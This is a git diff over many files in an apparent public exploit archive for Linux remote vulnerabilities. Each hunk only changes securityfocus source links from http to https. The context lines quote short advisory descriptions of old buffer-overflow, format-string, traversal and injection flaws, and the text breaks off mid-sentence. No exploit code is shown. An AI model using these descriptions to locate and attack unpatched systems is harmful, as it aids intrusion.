b/exploits/linux/remote/22264.txt index e94757d1f..7bae3abe6 100644 --- a/exploits/linux/remote/22264.txt +++ b/exploits/linux/remote/22264.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6884/info +source: https://www.securityfocus.com/bid/6884/info A side-channel attack against implementations of SSL exists that, through analysis of the timing of certain operations, can reveal sensitive information to an active adversary. This information leaked by vulnerable implementations is reportedly sufficient for an adaptive attack that will ultimately obtain plaintext of a target block of ciphertext. diff --git a/exploits/linux/remote/22274.c b/exploits/linux/remote/22274.c index c3027fab1..dbd4bfbfa 100644 --- a/exploits/linux/remote/22274.c +++ b/exploits/linux/remote/22274.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6913/info +// source: https://www.securityfocus.com/bid/6913/info A buffer-overrun vulnerability has been reported in the Zlib compression library. Due to the use of 'vsprintf()' by an internal Zlib function, an attacker can cause memory to become corrupted. This buffer overrun occurs becuase the software fails to check the boundaries of user-supplied data given to the 'gzprintf()' function. diff --git a/exploits/linux/remote/22275.pl b/exploits/linux/remote/22275.pl index a5aee6533..9fd6769b5 100755 --- a/exploits/linux/remote/22275.pl +++ b/exploits/linux/remote/22275.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6915/info +source: https://www.securityfocus.com/bid/6915/info A vulnerability has been discovered in the 'Miniserv.pl' script used to invoke both Webmin and Usermin. Due to insufficient sanitization of client-supplied BASE64 encoded input, it is possible to inject a Session ID into the access control list. diff --git a/exploits/linux/remote/22278.pl b/exploits/linux/remote/22278.pl index 6b1c0222e..8ff47ed74 100755 --- a/exploits/linux/remote/22278.pl +++ b/exploits/linux/remote/22278.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6921/info +source: https://www.securityfocus.com/bid/6921/info A buffer overflow vulnerability has been reported for moxftp. The vulnerability occurs when moxftp is parsing 'Welcome' banner messages from remote FTP servers. When moxftp receives an overly long FTP banner, it will trigger the overflow condition. diff --git a/exploits/linux/remote/22291.c b/exploits/linux/remote/22291.c index bf2a868ee..db90d723a 100644 --- a/exploits/linux/remote/22291.c +++ b/exploits/linux/remote/22291.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6968/info +// source: https://www.securityfocus.com/bid/6968/info A format string vulnerability has been discovered AMX Mod 0.9.2 and earlier which may be exploitable to execute arbitrary code on a target Half-Life server. The problem occurs when calling the 'amx_say' command. By passing specially constructed format specifiers as an argument to the command, it is possible to modify arbitrary locations in memory. diff --git a/exploits/linux/remote/22342.c b/exploits/linux/remote/22342.c index 7b26cfd4c..5f437fdb2 100644 --- a/exploits/linux/remote/22342.c +++ b/exploits/linux/remote/22342.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7058/info +// source: https://www.securityfocus.com/bid/7058/info A memory corruption vulnerability has been discovered in Qpopper version 4.0.4 and earlier. diff --git a/exploits/linux/remote/22346.c b/exploits/linux/remote/22346.c index 8e18ef771..0eecc9952 100644 --- a/exploits/linux/remote/22346.c +++ b/exploits/linux/remote/22346.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7071/info +// source: https://www.securityfocus.com/bid/7071/info A vulnerability has been discovered in PGP4Pine. The problem occurs when parsing an email message for PGP data. Due to insufficient bounds checking, when processing lines of excessive length, a buffer may be overrun. This would result in sensitive locations in memory being overwritten with data supplied in the message. diff --git a/exploits/linux/remote/22353.c b/exploits/linux/remote/22353.c index dc410dcbb..c0cc665ef 100644 --- a/exploits/linux/remote/22353.c +++ b/exploits/linux/remote/22353.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7097/info +// source: https://www.securityfocus.com/bid/7097/info A memory corruption vulnerability has been discovered in BitchX 1.0c19. This issue occurs when handling server-supplied data and may cause characters to be written to sensitive stack memory. As a result, it may be possible for a malicious IRC server to execute arbitrary commands on a vulnerable client. diff --git a/exploits/linux/remote/22361.cpp b/exploits/linux/remote/22361.cpp index 7092725cb..11765b9a4 100644 --- a/exploits/linux/remote/22361.cpp +++ b/exploits/linux/remote/22361.cpp @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7110/info +source: https://www.securityfocus.com/bid/7110/info An information disclosure weakness has been reported for Qpopper when authenticating. The weakness is due to the fact that if a valid username is sent with a bad password, Qpopper will wait a small amount of time prior to disconnecting the client. If the username that is sent is invalid, Qpopper immediately disconnects the client. diff --git a/exploits/linux/remote/22369.txt b/exploits/linux/remote/22369.txt index adef72229..6de1d74f5 100644 --- a/exploits/linux/remote/22369.txt +++ b/exploits/linux/remote/22369.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7117/info +source: https://www.securityfocus.com/bid/7117/info The Evolution mail client supports "uuencoded" content and decodes it automatically when a message is initially parsed. A memory corruption error is present in the parsing component that can result in the client crashing when specially malformed content is decoded. The presence of such a message in an Evolution user's mailbox may result in a prolonged denial of service as the crashing of the GUI may prevent deletion of the message. The user will also not be able to read messages while the message is present in their mailbox. It is not yet determined whether this vulnerability may be exploited by remote attackers to compromise client hosts. Users are advised to upgrade despite this uncertainty. diff --git a/exploits/linux/remote/22371.txt b/exploits/linux/remote/22371.txt index bfb1c1b21..19b192ca4 100644 --- a/exploits/linux/remote/22371.txt +++ b/exploits/linux/remote/22371.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7119/info +source: https://www.securityfocus.com/bid/7119/info Ximian Evolution does not properly validate MIME image/* Content-Type fields. If an email message contains an image/* Content-Type, any type of data can be embedded where the image information is expected. This can be used to embed HTML tags that will be rendered by GTKHtml, bypass policies, or invoke bonobo components to handle external content types. diff --git a/exploits/linux/remote/22379.c b/exploits/linux/remote/22379.c index daceb0282..977a5365c 100644 --- a/exploits/linux/remote/22379.c +++ b/exploits/linux/remote/22379.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7129/info +// source: https://www.securityfocus.com/bid/7129/info A vulnerability has been discovered in PXE which is included with Red Hat Linux. Specifically, it is possible for a remote attacker to overrun a buffer by passing excessive data to the service. This may result in the corruption of sensitive process memory, and as such may allow an attacker to execute arbitrary commands. diff --git a/exploits/linux/remote/22454.c b/exploits/linux/remote/22454.c index d7ca3d524..bb53db8a4 100644 --- a/exploits/linux/remote/22454.c +++ b/exploits/linux/remote/22454.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7268/info +// source: https://www.securityfocus.com/bid/7268/info It has been reported that a boundary condition error exists in WebC. Because of this, it may be possible for a remote attacker to gain unauthorized access to a vulnerable host. diff --git a/exploits/linux/remote/22479.c b/exploits/linux/remote/22479.c index 89624dfcd..a8d4211a1 100644 --- a/exploits/linux/remote/22479.c +++ b/exploits/linux/remote/22479.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7316/info +// source: https://www.securityfocus.com/bid/7316/info A buffer-overflow vulnerability has been discovered in PoPToP PPTP. The problem occurs because the software fails to do sufficient sanity checks when referencing user-supplied input used in various calculations. As a result, an attacker may be able to trigger a condition that would corrupt sensitive memory. diff --git a/exploits/linux/remote/22485.c b/exploits/linux/remote/22485.c index f52f86fff..501d2733d 100644 --- a/exploits/linux/remote/22485.c +++ b/exploits/linux/remote/22485.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7336/info +// source: https://www.securityfocus.com/bid/7336/info A vulnerability has been discovered in SheerDNS. Due to insufficient sanitization of DNS requests, an attacker may be able to view the contents of an arbitrary system directory or file. Information obtained by exploiting this issue may aid an attacker in launching further attacks against a target system. diff --git a/exploits/linux/remote/22584.txt b/exploits/linux/remote/22584.txt index 50d3e1514..45d5db50a 100644 --- a/exploits/linux/remote/22584.txt +++ b/exploits/linux/remote/22584.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7550/info +source: https://www.securityfocus.com/bid/7550/info Info-ZIP UnZip contains a vulnerability during the handling of pathnames for archived files. Specifically, when certain encoded characters are inserted into '../' directory traversal sequences, the creator of the archive can cause the file to be extracted to arbitrary locations on the filesystem - including paths containing system binaries and other sensitive or confidential information. diff --git a/exploits/linux/remote/22601.txt b/exploits/linux/remote/22601.txt index 61b78440d..cf4e67fea 100644 --- a/exploits/linux/remote/22601.txt +++ b/exploits/linux/remote/22601.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7596/info +source: https://www.securityfocus.com/bid/7596/info Inktomi Traffic Server is prone to a cross-site scripting vulnerability. This is due to insufficient sanitization of input passed to the proxy, which will be echoed back in error pages under some circumstances. A malicious attacker could exploit this issue by creating a link which contains hostile HTML and script code and then enticing users of the proxy to visit the link. When the link is visited via the proxy, attacker-supplied script may be interpreted in the user's browser. diff --git a/exploits/linux/remote/22622.txt b/exploits/linux/remote/22622.txt index 6cb3784e6..c65e369d2 100644 --- a/exploits/linux/remote/22622.txt +++ b/exploits/linux/remote/22622.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7642/info +source: https://www.securityfocus.com/bid/7642/info A vulnerability has been reported in WsMp3. The problem occurs due to insufficient sanitization of HTTP GET requests. As a result, an attacker may be capable of accessing the contents of sensitive system resources. Information obtained through the exploitation of this issue may aid an attacker in launching further attacks against a target system. diff --git a/exploits/linux/remote/22623.txt b/exploits/linux/remote/22623.txt index bfa5194a1..ba6b38a2a 100644 --- a/exploits/linux/remote/22623.txt +++ b/exploits/linux/remote/22623.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7645/info +source: https://www.securityfocus.com/bid/7645/info A vulnerability has been reported in WsMp3. The problem occurs due to insufficient sanitization of HTTP POST requests. As a result, an attacker may be capable of executing arbitrary files on a target system. This may lead to the complete compromise of a target system. diff --git a/exploits/linux/remote/22658.pl b/exploits/linux/remote/22658.pl index 5a77bcb61..f18af07bb 100755 --- a/exploits/linux/remote/22658.pl +++ b/exploits/linux/remote/22658.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7699/info +source: https://www.securityfocus.com/bid/7699/info Batalla Naval is prone to a remotely exploitable buffer overflow when handling requests of excessive length. This could allow for execution of malicious instructions in the context of the game server. diff --git a/exploits/linux/remote/22659.c b/exploits/linux/remote/22659.c index f44ecc3d3..f4dd6af3d 100644 --- a/exploits/linux/remote/22659.c +++ b/exploits/linux/remote/22659.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7699/info +// source: https://www.securityfocus.com/bid/7699/info Batalla Naval is prone to a remotely exploitable buffer overflow when handling requests of excessive length. This could allow for execution of malicious instructions in the context of the game server. diff --git a/exploits/linux/remote/2274.c b/exploits/linux/remote/2274.c index 2c87a9f40..a7aaaa20f 100644 --- a/exploits/linux/remote/2274.c +++ b/exploits/linux/remote/2274.c @@ -23,7 +23,7 @@ ___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __ [i] Title: Streamripper HTTP Header Parsing Buffer Overflow Exploit [i] Discovered by: Ulf Harnhammar [i] Exploit by: Expanders -[i] References: http://www.securityfocus.com/bid/19707 --- http://streamripper.sourceforge.net/ +[i] References: https://www.securityfocus.com/bid/19707 --- http://streamripper.sourceforge.net/ [i] Greatings: x0n3-h4ck - netbunny - my girlfriend..thanks for existing [ Why streamripper crash? ] diff --git a/exploits/linux/remote/22771.txt b/exploits/linux/remote/22771.txt index 273d51a81..4df85a7c0 100644 --- a/exploits/linux/remote/22771.txt +++ b/exploits/linux/remote/22771.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7912/info +source: https://www.securityfocus.com/bid/7912/info A vulnerability has been reported for multiple PDF viewers for Unix variant operating systems. The problem is said to occur when hyperlinks have been enabled within the viewer. Allegedly, by placing a specially formatted hyperlink within a PDF file it is possible to execute arbitrary shell commands when a user clicks the link. This is due to the PDF viewer invoking an external application, via a call to 'sh -c', to handle the request. diff --git a/exploits/linux/remote/22786.c b/exploits/linux/remote/22786.c index 5855109ab..7a2d108c1 100644 --- a/exploits/linux/remote/22786.c +++ b/exploits/linux/remote/22786.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7945/info +// source: https://www.securityfocus.com/bid/7945/info It has been reported that Dune is vulnerable to a remote boundary condition error when handling long requests. This could allow a remote attacker to execute arbitrary code on a vulnerable system. diff --git a/exploits/linux/remote/22830.c b/exploits/linux/remote/22830.c index f1e927b63..ffdc0136b 100644 --- a/exploits/linux/remote/22830.c +++ b/exploits/linux/remote/22830.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/8021/info +source: https://www.securityfocus.com/bid/8021/info It has been reported that lbreakout2 is vulnerable to a format string issue in the login component. This may result in an attacker executing arbitrary code on a vulnerable host. */ diff --git a/exploits/linux/remote/22848.c b/exploits/linux/remote/22848.c index 422a4b000..56f7e2513 100644 --- a/exploits/linux/remote/22848.c +++ b/exploits/linux/remote/22848.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8071/info +// source: https://www.securityfocus.com/bid/8071/info It has been reported that ezbounce is affected by a format string vulnerability. The condition is present in the file "ezbounce/commands.cpp" and can be triggered when session support is enabled. To exploit this vulnerability, the attacker must have valid credentials. This flaw may be of use to attackers who have proxy access but no privileges on the underlying host. diff --git a/exploits/linux/remote/22873.c b/exploits/linux/remote/22873.c index 5116ff872..c73cebf6a 100644 --- a/exploits/linux/remote/22873.c +++ b/exploits/linux/remote/22873.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8118/info +// source: https://www.securityfocus.com/bid/8118/info It has been reported that the Mailwatch plugin for GKrellM is vulnerable to a remotely exploitable buffer overflow. This may permit the execution of arbitrary code with the privileges of the GKrellM program. diff --git a/exploits/linux/remote/22893.c b/exploits/linux/remote/22893.c index 7135bebec..6d8a1fea2 100644 --- a/exploits/linux/remote/22893.c +++ b/exploits/linux/remote/22893.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8167/info +// source: https://www.securityfocus.com/bid/8167/info It has been reported that the FTP gateway component within the gopherd server is prone to a buffer overflow vulnerability. This vulnerability may be present due to a failure to perform bounds checking when processing long filenames returned from the FTP LIST command. This could permit code execution in the context of the software. diff --git a/exploits/linux/remote/22894.c b/exploits/linux/remote/22894.c index 3721220c2..584566e10 100644 --- a/exploits/linux/remote/22894.c +++ b/exploits/linux/remote/22894.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8168/info +// source: https://www.securityfocus.com/bid/8168/info It has been reported that there is a buffer overflow condition present in gopherd that may be exploited remotely to execute arbitrary code. The affected component is said to be used for determining view-types for gopher objects. diff --git a/exploits/linux/remote/22908.c b/exploits/linux/remote/22908.c index f77423e42..5231cdb64 100644 --- a/exploits/linux/remote/22908.c +++ b/exploits/linux/remote/22908.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8194/info +// source: https://www.securityfocus.com/bid/8194/info The Exceed server and client have been reported prone to a remotely triggered buffer overflow vulnerability. An attacker may trigger this vulnerability by sending excessive data as a font name to the server via a malicios XLoadQueryFont() request, or by passing a malicious font name from the server to the client in a manner sufficient to trigger the overflow. When the vulnerable software handles this request it will crash. diff --git a/exploits/linux/remote/22968.c b/exploits/linux/remote/22968.c index 4fc5ddee3..383922a19 100644 --- a/exploits/linux/remote/22968.c +++ b/exploits/linux/remote/22968.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/8300/info +// source: https://www.securityfocus.com/bid/8300/info // Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-//check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server. diff --git a/exploits/linux/remote/22969.c b/exploits/linux/remote/22969.c index fcc6e135a..a9ed6ffd9 100644 --- a/exploits/linux/remote/22969.c +++ b/exploits/linux/remote/22969.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/8300/info +// source: https://www.securityfocus.com/bid/8300/info // Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server. diff --git a/exploits/linux/remote/23049.c b/exploits/linux/remote/23049.c index e987764a9..cbd2573da 100644 --- a/exploits/linux/remote/23049.c +++ b/exploits/linux/remote/23049.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8467/info +// source: https://www.securityfocus.com/bid/8467/info Several stack-based buffer overflow vulnerabilities exist in multiple srcpd commands that may allow an attacker to run arbitrary code on a vulnerable host. The vulnerability is due to the lack of boundary checking in the affected functions, leading to stack overflow conditions. diff --git a/exploits/linux/remote/23054.txt b/exploits/linux/remote/23054.txt index a0d301540..e5d0346d9 100644 --- a/exploits/linux/remote/23054.txt +++ b/exploits/linux/remote/23054.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8479/info +source: https://www.securityfocus.com/bid/8479/info WIDZ does not validate untrusted input when generating alerts. Alerts pass the essid of an unknown wireless access point through a system() call. By setting the essid of an unauthorized access point to include malformed information, the underlying operating system may be compromised. diff --git a/exploits/linux/remote/23115.c b/exploits/linux/remote/23115.c index c38c94d17..52d4bce8c 100644 --- a/exploits/linux/remote/23115.c +++ b/exploits/linux/remote/23115.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8557/info +// source: https://www.securityfocus.com/bid/8557/info A remote buffer overflow vulnerability when calling the sscanf() function has been reported to affect the mah-jong game client and server programs. The issue occurs within seperate source files, however the code used by both programs is identical. It should be noted that the bug must be triggered using different options depending on whether the target is a client or server. diff --git a/exploits/linux/remote/23151.c b/exploits/linux/remote/23151.c index 2d972e007..a05897af8 100644 --- a/exploits/linux/remote/23151.c +++ b/exploits/linux/remote/23151.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8629/info +// source: https://www.securityfocus.com/bid/8629/info Liquid War has been reported prone to a buffer overflow condition when handling HOME environment variables of excessive length. diff --git a/exploits/linux/remote/23154.c b/exploits/linux/remote/23154.c index 87fc9aa71..c45de5972 100644 --- a/exploits/linux/remote/23154.c +++ b/exploits/linux/remote/23154.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/8641/info +source: https://www.securityfocus.com/bid/8641/info Sendmail is prone to a buffer overrun vulnerability in the prescan() function. This issue is different than the vulnerability described in BID 7230. This vulnerability could permit remote attackers to execute arbitrary code via vulnerable versions of Sendmail. */ diff --git a/exploits/linux/remote/23161.c b/exploits/linux/remote/23161.c index 8cfd4f5d3..804440a9a 100644 --- a/exploits/linux/remote/23161.c +++ b/exploits/linux/remote/23161.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8655/info +// source: https://www.securityfocus.com/bid/8655/info lsh has been reported prone to a remote buffer overflow vulnerability. The condition is reported to present itself in fairly restrictive circumstances, and has been reported to be exploitable pre-authentication. Successful exploitation could result in the execution of arbitrary attacker supplied instructions in the context of the affected daemon. diff --git a/exploits/linux/remote/23162.c b/exploits/linux/remote/23162.c index 2e4fd77c2..795779ecb 100644 --- a/exploits/linux/remote/23162.c +++ b/exploits/linux/remote/23162.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8655/info +// source: https://www.securityfocus.com/bid/8655/info lsh has been reported prone to a remote buffer overflow vulnerability. The condition is reported to present itself in fairly restrictive circumstances, and has been reported to be exploitable pre-authentication. Successful exploitation could result in the execution of arbitrary attacker supplied instructions in the context of the affected daemon. diff --git a/exploits/linux/remote/23171.c b/exploits/linux/remote/23171.c index 85342e4ff..e3978aa50 100644 --- a/exploits/linux/remote/23171.c +++ b/exploits/linux/remote/23171.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8680/info +// source: https://www.securityfocus.com/bid/8680/info A problem in the handling of some types of remote files has been reported in mpg123. Because of this, it may be possible for a remote attacker to execute arbitrary code with the privileges of the mpg123 user. diff --git a/exploits/linux/remote/23182.c b/exploits/linux/remote/23182.c index e26f814cf..1791a1a75 100644 --- a/exploits/linux/remote/23182.c +++ b/exploits/linux/remote/23182.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8699/info +// source: https://www.securityfocus.com/bid/8699/info cfengine is prone to a stack-based buffer overrun vulnerability. This issue may be exploited by remote attackers who can send malicious transaction packets to cfservd. This issue is due to insufficient bounds checking of data that is read in during a transaction with a remote user. diff --git a/exploits/linux/remote/23183.c b/exploits/linux/remote/23183.c index e5c576343..81d33064b 100644 --- a/exploits/linux/remote/23183.c +++ b/exploits/linux/remote/23183.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8699/info +// source: https://www.securityfocus.com/bid/8699/info cfengine is prone to a stack-based buffer overrun vulnerability. This issue may be exploited by remote attackers who can send malicious transaction packets to cfservd. This issue is due to insufficient bounds checking of data that is read in during a transaction with a remote user. diff --git a/exploits/linux/remote/23186.txt b/exploits/linux/remote/23186.txt index 8c6929285..23e5c2ef5 100644 --- a/exploits/linux/remote/23186.txt +++ b/exploits/linux/remote/23186.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8702/info +source: https://www.securityfocus.com/bid/8702/info A vulnerability has been discovered in MPLayer when handling malformed streaming ASX file headers. The problem occurs due to insufficient bounds checking performed within asf_http_request(). It has been demonstrated that it is possible for a remote attacker to provide a malicious streaming ASX file that will overrun the bounds of a reserved buffer, when a vulnerable version of MPlayer is used to interpret the file. Remote arbitrary code execution has been confirmed possible. diff --git a/exploits/linux/remote/23188.c b/exploits/linux/remote/23188.c index 2e16ab7f5..e7bd82eb7 100644 --- a/exploits/linux/remote/23188.c +++ b/exploits/linux/remote/23188.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8709/info +// source: https://www.securityfocus.com/bid/8709/info Athttpd is said to be prone to a remote buffer overrun that could allow an attacker to execute arbitrary code. The problem occurs due to insufficient bounds checking when handling GET requests. As a result, an attacker may be capable of overrunning the bounds of an internal memory buffer and effectively control the flow of execution. diff --git a/exploits/linux/remote/23196.c b/exploits/linux/remote/23196.c index e350f92c5..e3e322531 100644 --- a/exploits/linux/remote/23196.c +++ b/exploits/linux/remote/23196.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8726/info +// source: https://www.securityfocus.com/bid/8726/info It has been discovered that WebFS is prone to a buffer overrun vulnerability when handling path names of excessive length. As a result, an attacker may be capable of triggering the condition and overwriting sensitive memory with malicious data. This could ultimately allow for the execution of arbitrary code with the privileges of the WebFS HTTP server. diff --git a/exploits/linux/remote/23295.txt b/exploits/linux/remote/23295.txt index 96c734432..bf9ccf8d4 100644 --- a/exploits/linux/remote/23295.txt +++ b/exploits/linux/remote/23295.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8897/info +source: https://www.securityfocus.com/bid/8897/info A problem has been identified in the handling of some characters by sh-httpd. Because of this, an attacker may be able to gain unauthorized access to information. diff --git a/exploits/linux/remote/23296.txt b/exploits/linux/remote/23296.txt index 56c10116b..20f58c1b0 100644 --- a/exploits/linux/remote/23296.txt +++ b/exploits/linux/remote/23296.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8898/info +source: https://www.securityfocus.com/bid/8898/info The Red Hat Apache configuration may allow an attacker to view directory listings. The problem is reported to present itself when an attacker issues an HTTP GET request to a vulnerable server containing '//' characters, evading the rule desgined to prevent Apache from displaying directory listings with a request for '/'. The server is reported to disclose directory listings even when autoindex for the root directory has been disabled and a default welcome page is supposed to be displayed. diff --git a/exploits/linux/remote/23306.c b/exploits/linux/remote/23306.c index df0ec2d84..82ed0df77 100644 --- a/exploits/linux/remote/23306.c +++ b/exploits/linux/remote/23306.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8906/info +// source: https://www.securityfocus.com/bid/8906/info A vulnerability has been reported in thttpd that may allow a remote attacker to execute arbitrary code on vulnerable host. The issue is reported to exist due to a lack of bounds checking by software, leading to a buffer overflow condition. The problem is reported to exist in the defang() function in libhttpd.c. diff --git a/exploits/linux/remote/23366.c b/exploits/linux/remote/23366.c index f4ecd72fc..3943c82ef 100644 --- a/exploits/linux/remote/23366.c +++ b/exploits/linux/remote/23366.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8999/info +// source: https://www.securityfocus.com/bid/8999/info A remotely exploitable buffer overrun has been reported in Epic. This issue may reportedly be exploited by a malicious server that supplies an overly long nickname in a CTCP messages, potentially allowing for execution of arbitrary code in the context of the client user. It may be also be possible for a malicious client to send such a message, but it is likely that the server will limit the length. diff --git a/exploits/linux/remote/23368.c b/exploits/linux/remote/23368.c index 2bb193396..5b5e9db80 100644 --- a/exploits/linux/remote/23368.c +++ b/exploits/linux/remote/23368.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9002/info +// source: https://www.securityfocus.com/bid/9002/info UnAce has been reported to be prone to a buffer overflow vulnerability. The issue presents itself when UnAce handles ace filenames that are of excessive length. When this filename is passed to the UnAce utility as an argument, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the user who is running UnAce. diff --git a/exploits/linux/remote/23369.c b/exploits/linux/remote/23369.c index 193addce1..eecd4895a 100644 --- a/exploits/linux/remote/23369.c +++ b/exploits/linux/remote/23369.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9002/info +// source: https://www.securityfocus.com/bid/9002/info UnAce has been reported to be prone to a buffer overflow vulnerability. The issue presents itself when UnAce handles ace filenames that are of excessive length. When this filename is passed to the UnAce utility as an argument, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the user who is running UnAce. diff --git a/exploits/linux/remote/23371.c b/exploits/linux/remote/23371.c index 8635d84db..c5285e5cc 100644 --- a/exploits/linux/remote/23371.c +++ b/exploits/linux/remote/23371.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9005/info +// source: https://www.securityfocus.com/bid/9005/info Hylafax hfaxd (daemon) has been reported prone to an unspecified format string vulnerability that may be exploited under non-standard configurations to execute arbitrary instructions remotely as the root user. diff --git a/exploits/linux/remote/23397.pl b/exploits/linux/remote/23397.pl index bbca0f5d9..a65b03330 100755 --- a/exploits/linux/remote/23397.pl +++ b/exploits/linux/remote/23397.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9099/info +source: https://www.securityfocus.com/bid/9099/info A buffer overrun vulnerability has been discovered in Monit 4.1 and earlier that could be exploited remotely to gain root privileges. The problem occurs due to insufficient bounds checking when handling overly long HTTP requests. As a result, it may be possible for a remote attacker to corrupt sensitive process data in such a way that the execution flow of Monit can be controlled. diff --git a/exploits/linux/remote/23413.c b/exploits/linux/remote/23413.c index 69a6421d8..c44ef5528 100644 --- a/exploits/linux/remote/23413.c +++ b/exploits/linux/remote/23413.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9156/info +// source: https://www.securityfocus.com/bid/9156/info It has been reported that a buffer overflow condition is present in the authentication mechanism implemented in Ebola. The condition is due to the use of the C library function sprintf() to construct an error message when authentication is not successful. According to the discoverer of this flaw, the vulnerability is remotely exploitable. diff --git a/exploits/linux/remote/23441.c b/exploits/linux/remote/23441.c index 92ff1b265..956dfddbd 100644 --- a/exploits/linux/remote/23441.c +++ b/exploits/linux/remote/23441.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9227/info +// source: https://www.securityfocus.com/bid/9227/info A problem has been identified in the Cyrus IMSP Daemon implementation when handling certain types of requests. Because of this, it may be possible for a remote attacker to gain unauthorized access to a system using the vulnerable software. diff --git a/exploits/linux/remote/23585.txt b/exploits/linux/remote/23585.txt index d5f583eeb..ad21d5957 100644 --- a/exploits/linux/remote/23585.txt +++ b/exploits/linux/remote/23585.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9478/info +source: https://www.securityfocus.com/bid/9478/info Finjan SurfinGate is prone to a vulnerability that may permit remote attackers to execute certain management commands (using the FHTTP protocol) through the management control port (3141/TCP). It has been reported that commands could be issued to restart the server, most likely resulting in a denial of service. diff --git a/exploits/linux/remote/23604.txt b/exploits/linux/remote/23604.txt index 9d0316f86..6848b86e5 100644 --- a/exploits/linux/remote/23604.txt +++ b/exploits/linux/remote/23604.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9495/info +source: https://www.securityfocus.com/bid/9495/info It has been reported that Antologic Antolinux may be prone to a remote command execution vulnerability that may allow an attacker to execute arbitrary commands with the privileges of the server hosting the vulnerable software. The issue exists due to insufficient sanitization of user-supplied input via the 'NDCR' parameter. An attacker may need to spoof the HTTP REFERER and the vulnerability may only be exploited if sudo is not enabled. diff --git a/exploits/linux/remote/23671.txt b/exploits/linux/remote/23671.txt index 7205287d4..a5db7e2c0 100644 --- a/exploits/linux/remote/23671.txt +++ b/exploits/linux/remote/23671.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9617/info +source: https://www.securityfocus.com/bid/9617/info It has been reported that Resin may be prone to an information disclosure vulnerability that may allow an attacker to disclose directory listings by passing malicious data via a URI parameter. diff --git a/exploits/linux/remote/23728.txt b/exploits/linux/remote/23728.txt index 79c96d2c6..d132f277e 100644 --- a/exploits/linux/remote/23728.txt +++ b/exploits/linux/remote/23728.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9692/info +source: https://www.securityfocus.com/bid/9692/info Metamail has been reported prone to multiple vulnerabilities that may provide for arbitrary code execution. Two buffer overflow vulnerabilities have been reported to affect Metamail. Additionally, two format string-handling vulnerabilities have been reported. These issues may also be 